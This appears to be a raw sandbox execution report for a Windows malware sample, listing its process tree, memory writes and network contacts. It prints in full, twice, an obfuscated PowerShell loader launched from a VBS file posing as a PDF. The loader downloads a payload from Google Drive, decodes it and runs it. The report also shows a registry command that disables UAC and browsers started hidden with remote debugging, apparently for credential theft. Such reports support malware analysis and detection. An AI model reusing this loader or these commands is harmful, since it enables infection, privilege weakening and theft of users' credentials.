PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 2648 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 4520 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 4520 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 3076 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 3076 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 3076 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1036 wrote to memory of 3076 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11315781264·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Undiscriminatingness Vodun Hervards Folkefrontsregeringen Carmakers #><#Polyhedrons Versionsnavnenes Baalets Quadrennially Catarines Recondite #>$Disleaf100='Mrtel';function Moderates7($Trdestens){If ($host.DebuggerEnabled) {$Flood++;$effectualnesses=$Trdestens.'Length' - $Flood} for ( $Foelelsen=4;$Foelelsen -lt $effectualnesses;$Foelelsen+=5){$Brillanters151=$Foelelsen;$Sippingly+=$Trdestens[$Foelelsen]}$Sippingly}function forsrgelseskommunernes($Primrfilers){ .($Modkandidaten) ($Primrfilers)}$Lossen=Moderates7 'Forgn KnoeGe,vtBist.Jeh w Vs.EEndybUnsecAlkol,eroIAspieSandn Re.Tco n ';$Splanchnopleure=Moderates7 'Kl.tM iaoK.gezTugti ClelFormlPrewaBac /Redi ';$flintres=Moderates7 ' sogTOrgalSupesColp1Unus2 ryn ';$Kliniskes='Mail[Rac,NGluce SquTOmsi.StresParneBasiR L mv kerIHe,sC Ko etwelPUnesOCe tiR giNPolyT amuMa,baASashng teAGenfG AirEAngrr ent]B ug: Ryk:,eenSDogseMar,cBet.U olsROm yI rigTPyrrYFl.nPclavr Couo FortMedio beecCharoSp oL ,ev=stud$OpspfBioglTummi ormN Sn.TParlrUlykeOf dSMoze ';$Splanchnopleure+=Moderates7 ' aje5Cas .fors0Skar T sk( imiW,okuiOrddnDo.adsteroAy twF,apsNu z V,nNchroTErob rot 1Cens0Type.Prod0Hove;Te r SensW nci Keln B.a6 Rec4Fakt;Dile MichxUdfo6Gyld4Klor;Exhu UnmrRentvtext: es1 Ill3Eret1aper.None0Reve) Ant Cu.GProgeP rocpalikRn,eo Hai/ .ap2,ede0 Ful1E,in0 Bu 0cata1Ud,l0,ovn1Li.p RevoFP.ntiSalgrTurbeSl gfakt o A txf ls/ Pec1N vl3De.e1Len .Nic 0Dipl ';$Umodenhedens246=Moderates7 'Ss.euLuneSMultEA roRComi-DkssAPadagSymmEPl tNSolltSted ';$Tallit=Moderates7 'R.buhPondtGud tThurpImpusAfse:Chid/anas/kr,pdDobbrTruci Cr,v Plue eng.Uds,gTayioTradoel kgImmalS.gne ush.Leibc SkroBorrmAn i/SquauBru,c.ors?PerreI loxNonspPreso Omsr ventQuod=PluvdSulpo BlewDiscnarenlNeuro Disa MoldImpr&Ph,sibungd kor=Karr1Siph1kejs6EsopG tepeBortVKlipSBeelxO tjaforu7StarC tifmMelo0 .esvFlorf M,lwMu.r2 Up zOve t EnapT,fnBEquimsaggqTa aL Bie8DialUVariy Me,A,orsNPancdC muA ap_Topao eal ';$Udfrselsforbuddets=Moderates7 'Quar>,yan ';$Modkandidaten=Moderates7 ' MidiGua EFes xDo e ';$Par='Problemfrit';$Skridfastes='\Banebryderes.Non';forsrgelseskommunernes (Moderates7 '.den$F kagLogalPagiOTem bF,miA arLP,is: Faxe C,nsRej rBeg o CurgS,egsEndo= ymn$Mas eKnleNCracV Cli:Le.saSkaaP Medp irsdN.npA Inft ho aBism+T mm$TranSWaivKMlkeREkspIRecrdUdprFOverARi oSUdbyT soEGropsFil ');forsrgelseskommunernes (Moderates7 'Andr$SeveGSkurlMks.O nsBFordAA baLCe.s:TidsCs enrPersoSammTKli aPirqp rimhEnthI Gauo RednBrnd=Efte$FisstTrinAVeinLE taLProtiHereT Per.DobbSS,eaP atal C,eIHypoTFras(Til.$U inuUnmuD ameF uborUvejSUroceHalel MooSDsleFPar,OH.ikRtopfbBogpu heDRaadD FriELapaT orss Dat)S,ot ');forsrgelseskommunernes (Moderates7 $Kliniskes);$Tallit=$Crotaphion[0];$Mytologiers=(Moderates7 'Preg$FodngIndklBlodoOpd,B alaDesslWarm:di essvmmITeleLKarrjRe mAHankSPort=CellNSkrieFadeW K,i-,lado D bB ArbJAsice CatCd,rmTHngt .ncrSVareyReacs E stUskaenutiMM lo. Art$ TriLFatto zygsGlauSpatcE ropnOv r ');forsrgelseskommunernes ($Mytologiers);forsrgelseskommunernes (Moderates7 'halv$UnfoSForriWooll refjKajaaA unsLigh.Cou.H ngeeVandaOu.tdT lbe afrr,allsdest[,epa$,ntaUI,gem TjroHidsdLarmeCycanAfbrhUvaneRoerd Do eFa.tnA,tisUsmm2 Fal4Resr6 Fe,] Eng=Bear$SkadS KetpAutolR,baa RepnTro csarahEpocn,agso wepOrdelskileAno upla r ndeFdre ');$Rumpadder=Moderates7 'Radi$SessSbi ti S,nlU etjfro a OopsUdfr.Unw DR ugoAutow azan koblscraoSpidaMaa dJarvFPoesiS bslTaveePros(Soci$,ourTForea Fril R nlThioi SubtRefu,To p$EutyV alvaBasnmSupesUrok)Goat ';$Vams=$Esrogs;forsrgelseskommunernes (Moderates7 'Flas$Photg,ontlAlimoDanuBHonnaZ ielLa d:SkrapInp R StrIOystoVo,eR BrniIgant.eriemazaT Ales udsRStryk Pyck ase draf NaiLVindG.ncoeUnde=C ma(DesatLi rE RedsEksptDege-F empCirkamangtVernhLekt Busf$skriVSladaPeccM.ortsMeso)Tils ');while (!$Prioritetsrkkeflge) {forsrgelseskommunernes (Moderates7 'Reri$TaargBanelMi toindpb F mareselTerm:YusdMMoraaFinapKlerpC.pteBillrEcho=Post$BrnetEmmer.lagu Drie rei ') ;forsrgelseskommunernes $Rumpadder;forsrgelseskommunernes (Moderates7 'BromsRespTVelsaTierRSta tStre- MovSInteLArcheKuldeundfp.qui Gran4Disa ');forsrgelseskommunernes (Moderates7 'Numm$UnreG AsmLOutsoM ltb lumA.ellL.ale: A sPLiftrOrnai irco ThaR,mbriFerrTSha eMeddtNonlsobskRF euKAn rKHandEKol,f IntL P.pg.ynfe,rab=Pist(Hus,tsys.e mansStjkTEksp- alpNataAOptoTModeHTord Anf$SupeV.ndka AntMOvers Jv.)Pann ') ;forsrgelseskommunernes (Moderates7 'sw n$SexgGAposLLideOEl ebunpeANonsLSita:MispR DrueSalvPTil EInderPhotKSe i= Lud$GromgG rnlElatO TriBTheoaMillL Exu:P ela Hetu allGUkbuUjoggSLizetAssuSAcetNCha D iera Ma,gBnkh+ko p+Tere%Pree$ lsdC FhorIsomoPerit BreaForeP GreHKoloiMicro lgtNGasa.Ret C ropoPounuMalmnAlumtNons ') ;$Tallit=$Crotaphion[$Reperk]}$poncho=321965;$Yawn=30428;forsrgelseskommunernes (Moderates7 'Elfo$Stefg UnbLCiliO C eBverdA DatLmela:PlejNAffueEnemPiridHhrecrIrr e DefCinditRoduAForeSSneaIEvapa Ye Chac=Proe BakuGS,iceTvist dr-meascBassORa iN.leuT Ture Tann JerTnrin yd r$S.ndVStruA yrmS.lss us ');forsrgelseskommunernes (Moderates7 'Udeb$ForbgCheel.enaoBirrbFor a.bdulHvil:DokuEMulmx KamsFolkeChokrRevitReunsHjfo Con =Bekl Ha.i[ InjSApriySirpsS lhtIndde Form Akk.BippC OveoFljdnarguvCu ue.nuer ToptMisp] Sot:Serv:BaadFKenirShunoIn emG,veB,eroaPasssAn.meCann6 len4InanSA oxtArcurGi tiOutlnAfragU de( Att$OogeNfugueVanlpUns,hRonirAn.ueAp rcRaditElekaTusksSpitiForvabegr)Bane ');forsrgelseskommunernes (Moderates7 'Vaga$ onGProclParaOUre BSilvaVestlPapi: S.rsDe omO,snAInamaZ naFK,nseInefj,ugsLMerssDoor Camo= Mon Str[Fa,ssRtehyEkspsDelttrecieFladMForb.ArbeTBezoE,vigX VdeT Chi.BeefECinnN roccBeskoFormd,rumiIn oNL anGBu l]Pare:bygn:MongA P fsPyraCOpbliCin.IBema.Ome gHinge GenT UdvsHumrtInfarVil ITilhNUsliGF,tt(Macr$D,ueE Lo xPhocs leENonerar.et.eleSMell)Afs ');forsrgelseskommunernes (Moderates7 'Rusl$syl GDerfl aphOQuasbB.spABundlF it:Te.bot ktP KomPBeleIGr,yGJapaN ImpoLemaRsid a V.dT,oveESpio=Me e$FabrsAbelmHyd AR dhAStilf Ov eF,reJSyndL finS T v.PaspSSkyhusig BRecosTlpetBl dRc uniSangn NonG Cha(Lill$trosPR.maOStyln.ericO,sth,nfrO al.,Geog$Skn.YTvrfaRuggwNewsnToha) onc ');forsrgelseskommunernes $Oppignorate;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Undiscriminatingness Vodun Hervards Folkefrontsregeringen Carmakers #><#Polyhedrons Versionsnavnenes Baalets Quadrennially Catarines Recondite #>$Disleaf100='Mrtel';function Moderates7($Trdestens){If ($host.DebuggerEnabled) {$Flood++;$effectualnesses=$Trdestens.'Length' - $Flood} for ( $Foelelsen=4;$Foelelsen -lt $effectualnesses;$Foelelsen+=5){$Brillanters151=$Foelelsen;$Sippingly+=$Trdestens[$Foelelsen]}$Sippingly}function forsrgelseskommunernes($Primrfilers){ .($Modkandidaten) ($Primrfilers)}$Lossen=Moderates7 'Forgn KnoeGe,vtBist.Jeh w Vs.EEndybUnsecAlkol,eroIAspieSandn Re.Tco n ';$Splanchnopleure=Moderates7 'Kl.tM iaoK.gezTugti ClelFormlPrewaBac /Redi ';$flintres=Moderates7 ' sogTOrgalSupesColp1Unus2 ryn ';$Kliniskes='Mail[Rac,NGluce SquTOmsi.StresParneBasiR L mv kerIHe,sC Ko etwelPUnesOCe tiR giNPolyT amuMa,baASashng teAGenfG AirEAngrr ent]B ug: Ryk:,eenSDogseMar,cBet.U olsROm yI rigTPyrrYFl.nPclavr Couo FortMedio beecCharoSp oL ,ev=stud$OpspfBioglTummi ormN Sn.TParlrUlykeOf dSMoze ';$Splanchnopleure+=Moderates7 ' aje5Cas .fors0Skar T sk( imiW,okuiOrddnDo.adsteroAy twF,apsNu z V,nNchroTErob rot 1Cens0Type.Prod0Hove;Te r SensW nci Keln B.a6 Rec4Fakt;Dile MichxUdfo6Gyld4Klor;Exhu UnmrRentvtext: es1 Ill3Eret1aper.None0Reve) Ant Cu.GProgeP rocpalikRn,eo Hai/ .ap2,ede0 Ful1E,in0 Bu 0cata1Ud,l0,ovn1Li.p RevoFP.ntiSalgrTurbeSl gfakt o A txf ls/ Pec1N vl3De.e1Len .Nic 0Dipl ';$Umodenhedens246=Moderates7 'Ss.euLuneSMultEA roRComi-DkssAPadagSymmEPl tNSolltSted ';$Tallit=Moderates7 'R.buhPondtGud tThurpImpusAfse:Chid/anas/kr,pdDobbrTruci Cr,v Plue eng.Uds,gTayioTradoel kgImmalS.gne ush.Leibc SkroBorrmAn i/SquauBru,c.ors?PerreI loxNonspPreso Omsr ventQuod=PluvdSulpo BlewDiscnarenlNeuro Disa MoldImpr&Ph,sibungd kor=Karr1Siph1kejs6EsopG tepeBortVKlipSBeelxO tjaforu7StarC tifmMelo0 .esvFlorf M,lwMu.r2 Up zOve t EnapT,fnBEquimsaggqTa aL Bie8DialUVariy Me,A,orsNPancdC muA ap_Topao eal ';$Udfrselsforbuddets=Moderates7 'Quar>,yan ';$Modkandidaten=Moderates7 ' MidiGua EFes xDo e ';$Par='Problemfrit';$Skridfastes='\Banebryderes.Non';forsrgelseskommunernes (Moderates7 '.den$F kagLogalPagiOTem bF,miA arLP,is: Faxe C,nsRej rBeg o CurgS,egsEndo= ymn$Mas eKnleNCracV Cli:Le.saSkaaP Medp irsdN.npA Inft ho aBism+T mm$TranSWaivKMlkeREkspIRecrdUdprFOverARi oSUdbyT soEGropsFil ');forsrgelseskommunernes (Moderates7 'Andr$SeveGSkurlMks.O nsBFordAA baLCe.s:TidsCs enrPersoSammTKli aPirqp rimhEnthI Gauo RednBrnd=Efte$FisstTrinAVeinLE taLProtiHereT Per.DobbSS,eaP atal C,eIHypoTFras(Til.$U inuUnmuD ameF uborUvejSUroceHalel MooSDsleFPar,OH.ikRtopfbBogpu heDRaadD FriELapaT orss Dat)S,ot ');forsrgelseskommunernes (Moderates7 $Kliniskes);$Tallit=$Crotaphion[0];$Mytologiers=(Moderates7 'Preg$FodngIndklBlodoOpd,B alaDesslWarm:di essvmmITeleLKarrjRe mAHankSPort=CellNSkrieFadeW K,i-,lado D bB ArbJAsice CatCd,rmTHngt .ncrSVareyReacs E stUskaenutiMM lo. Art$ TriLFatto zygsGlauSpatcE ropnOv r ');forsrgelseskommunernes ($Mytologiers);forsrgelseskommunernes (Moderates7 'halv$UnfoSForriWooll refjKajaaA unsLigh.Cou.H ngeeVandaOu.tdT lbe afrr,allsdest[,epa$,ntaUI,gem TjroHidsdLarmeCycanAfbrhUvaneRoerd Do eFa.tnA,tisUsmm2 Fal4Resr6 Fe,] Eng=Bear$SkadS KetpAutolR,baa RepnTro csarahEpocn,agso wepOrdelskileAno upla r ndeFdre ');$Rumpadder=Moderates7 'Radi$SessSbi ti S,nlU etjfro a OopsUdfr.Unw DR ugoAutow azan koblscraoSpidaMaa dJarvFPoesiS bslTaveePros(Soci$,ourTForea Fril R nlThioi SubtRefu,To p$EutyV alvaBasnmSupesUrok)Goat ';$Vams=$Esrogs;forsrgelseskommunernes (Moderates7 'Flas$Photg,ontlAlimoDanuBHonnaZ ielLa d:SkrapInp R StrIOystoVo,eR BrniIgant.eriemazaT Ales udsRStryk Pyck ase draf NaiLVindG.ncoeUnde=C ma(DesatLi rE RedsEksptDege-F empCirkamangtVernhLekt Busf$skriVSladaPeccM.ortsMeso)Tils ');while (!$Prioritetsrkkeflge) {forsrgelseskommunernes (Moderates7 'Reri$TaargBanelMi toindpb F mareselTerm:YusdMMoraaFinapKlerpC.pteBillrEcho=Post$BrnetEmmer.lagu Drie rei ') ;forsrgelseskommunernes $Rumpadder;forsrgelseskommunernes (Moderates7 'BromsRespTVelsaTierRSta tStre- MovSInteLArcheKuldeundfp.qui Gran4Disa ');forsrgelseskommunernes (Moderates7 'Numm$UnreG AsmLOutsoM ltb lumA.ellL.ale: A sPLiftrOrnai irco ThaR,mbriFerrTSha eMeddtNonlsobskRF euKAn rKHandEKol,f IntL P.pg.ynfe,rab=Pist(Hus,tsys.e mansStjkTEksp- alpNataAOptoTModeHTord Anf$SupeV.ndka AntMOvers Jv.)Pann ') ;forsrgelseskommunernes (Moderates7 'sw n$SexgGAposLLideOEl ebunpeANonsLSita:MispR DrueSalvPTil EInderPhotKSe i= Lud$GromgG rnlElatO TriBTheoaMillL Exu:P ela Hetu allGUkbuUjoggSLizetAssuSAcetNCha D iera Ma,gBnkh+ko p+Tere%Pree$ lsdC FhorIsomoPerit BreaForeP GreHKoloiMicro lgtNGasa.Ret C ropoPounuMalmnAlumtNons ') ;$Tallit=$Crotaphion[$Reperk]}$poncho=321965;$Yawn=30428;forsrgelseskommunernes (Moderates7 'Elfo$Stefg UnbLCiliO C eBverdA DatLmela:PlejNAffueEnemPiridHhrecrIrr e DefCinditRoduAForeSSneaIEvapa Ye Chac=Proe BakuGS,iceTvist dr-meascBassORa iN.leuT Ture Tann JerTnrin yd r$S.ndVStruA yrmS.lss us ');forsrgelseskommunernes (Moderates7 'Udeb$ForbgCheel.enaoBirrbFor a.bdulHvil:DokuEMulmx KamsFolkeChokrRevitReunsHjfo Con =Bekl Ha.i[ InjSApriySirpsS lhtIndde Form Akk.BippC OveoFljdnarguvCu ue.nuer ToptMisp] Sot:Serv:BaadFKenirShunoIn emG,veB,eroaPasssAn.meCann6 len4InanSA oxtArcurGi tiOutlnAfragU de( Att$OogeNfugueVanlpUns,hRonirAn.ueAp rcRaditElekaTusksSpitiForvabegr)Bane ');forsrgelseskommunernes (Moderates7 'Vaga$ onGProclParaOUre BSilvaVestlPapi: S.rsDe omO,snAInamaZ naFK,nseInefj,ugsLMerssDoor Camo= Mon Str[Fa,ssRtehyEkspsDelttrecieFladMForb.ArbeTBezoE,vigX VdeT Chi.BeefECinnN roccBeskoFormd,rumiIn oNL anGBu l]Pare:bygn:MongA P fsPyraCOpbliCin.IBema.Ome gHinge GenT UdvsHumrtInfarVil ITilhNUsliGF,tt(Macr$D,ueE Lo xPhocs leENonerar.et.eleSMell)Afs ');forsrgelseskommunernes (Moderates7 'Rusl$syl GDerfl aphOQuasbB.spABundlF it:Te.bot ktP KomPBeleIGr,yGJapaN ImpoLemaRsid a V.dT,oveESpio=Me e$FabrsAbelmHyd AR dhAStilf Ov eF,reJSyndL finS T v.PaspSSkyhusig BRecosTlpetBl dRc uniSangn NonG Cha(Lill$trosPR.maOStyln.ericO,sth,nfrO al.,Geog$Skn.YTvrfaRuggwNewsnToha) onc ');forsrgelseskommunernes $Oppignorate;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe4d4bcc40,0x7ffe4d4bcc4c,0x7ffe4d4bcc58

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ufzajcphovu"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\xzesjvabcdmmhqv"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\hujlkflcqlerjwrlbv"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,11332860034813592164,5518554563373405146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1936 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2112,i,11332860034813592164,5518554563373405146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2160 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,11332860034813592164,5518554563373405146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2336 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,11332860034813592164,5518554563373405146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,11332860034813592164,5518554563373405146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4572,i,11332860034813592164,5518554563373405146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4748,i,11332860034813592164,5518554563373405146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4568 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4600,i,11332860034813592164,5518554563373405146,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4884 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe58f546f8,0x7ffe58f54708,0x7ffe58f54718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,1003566259357109212,16694070162917044661,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,1003566259357109212,16694070162917044661,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,1003566259357109212,16694070162917044661,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2144,1003566259357109212,16694070162917044661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2144,1003566259357109212,16694070162917044661,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2144,1003566259357109212,16694070162917044661,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2144,1003566259357109212,16694070162917044661,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 drive.usercontent.google.com udp
